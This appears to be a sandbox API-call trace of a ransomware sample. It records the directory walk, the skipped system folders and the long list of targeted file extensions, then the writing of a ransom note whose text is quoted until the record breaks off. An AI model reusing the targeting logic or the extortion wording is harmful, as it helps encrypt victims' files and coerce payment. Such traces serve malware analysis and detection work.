	[0166.507] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\userdata\\*.*", lpSrch="programdata") returned 0x0
	[0166.512] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0166.512] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0166.512] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x7cbf8cdc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.513] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0166.513] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cbf8cdc, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cbf8cdc, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cbf8cdc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.513] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cbd2841, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cbd2841, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cbf8cdc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0166.513] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cbd2841, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cbd2841, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cbf8cdc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0166.513] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.513] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.514] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xe25ce006, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xe25ce006, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1
	[0166.514] lstrcmpW (lpString1="{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="..") returned 1
	[0166.514] lstrcmpW (lpString1="{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2=".") returned 1
	[0166.514] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun"
	[0166.514] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\"
	[0166.514] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\", lpString2="{9AC08E99-230B-47e8-9721-4577B7F124EA}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}"
	[0166.514] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}"
	[0166.515] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\"
	[0166.515] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\"
	[0166.515] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*.*"
	[0166.515] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xe25ce006, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xe25ce006, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.562] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*.*") returned 82
	[0166.562] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.563] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*.*", cchLength=0x52 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*") returned 0x52
	[0166.563] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.563] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="windows") returned 0x0
	[0166.563] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.563] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="boot") returned 0x0
	[0166.563] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.563] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="system volume information") returned 0x0
	[0166.564] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.564] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.564] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.564] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="temp") returned 0x0
	[0166.564] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.564] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="program files") returned 0x0
	[0166.564] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.565] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.565] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.565] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="appdata") returned 0x0
	[0166.565] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.565] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="application data") returned 0x0
	[0166.565] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.566] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="winnt") returned 0x0
	[0166.566] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.566] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="tmp") returned 0x0
	[0166.566] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.566] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="cache") returned 0x0
	[0166.566] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.566] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.566] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.567] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="webcache") returned 0x0
	[0166.567] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.567] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="inetcache") returned 0x0
	[0166.567] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.567] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="nvidia") returned 0x0
	[0166.567] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.567] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="packages") returned 0x0
	[0166.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.568] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="cookies") returned 0x0
	[0166.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.568] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="programdata") returned 0x0
	[0166.568] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xe25ce006, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xe25ce006, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.568] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x828cdbb9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x64e40818, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xd1e70, dwReserved0=0x0, dwReserved1=0x0, cFileName="integrator.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1
	[0166.568] lstrcmpW (lpString1="integrator.exe", lpString2="..") returned 1
	[0166.569] lstrcmpW (lpString1="integrator.exe", lpString2=".") returned 1
	[0166.569] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\"
	[0166.569] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", lpString2="integrator.exe" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe"
	[0166.569] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe") returned 93
	[0166.569] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.569] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe", cchLength=0x5d | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\integrator.exe") returned 0x5d
	[0166.569] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.569] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\integrator.exe", lpSrch="help_decrypt_your_files") returned 0x0
	[0166.570] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\integrator.exe" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\integrator.exe") returned="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\integrator.exe"
	[0166.570] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\integrator.exe") returned 93
	[0166.570] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.570] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.570] StrStrW (lpFirst=".exe", lpSrch=".") returned=".exe"
	[0166.571] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.571] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".exe") returned 0x0
	[0166.571] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x828cdbb9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x64e40818, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xd1e70, dwReserved0=0x0, dwReserved1=0x0, cFileName="integrator.exe", cAlternateFileName="INTEGR~1.EXE")) returned 0
	[0166.571] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.574] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.574] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}"
	[0166.574] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*.*"
	[0166.575] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.575] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.575] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 106
	[0166.575] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.579] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist 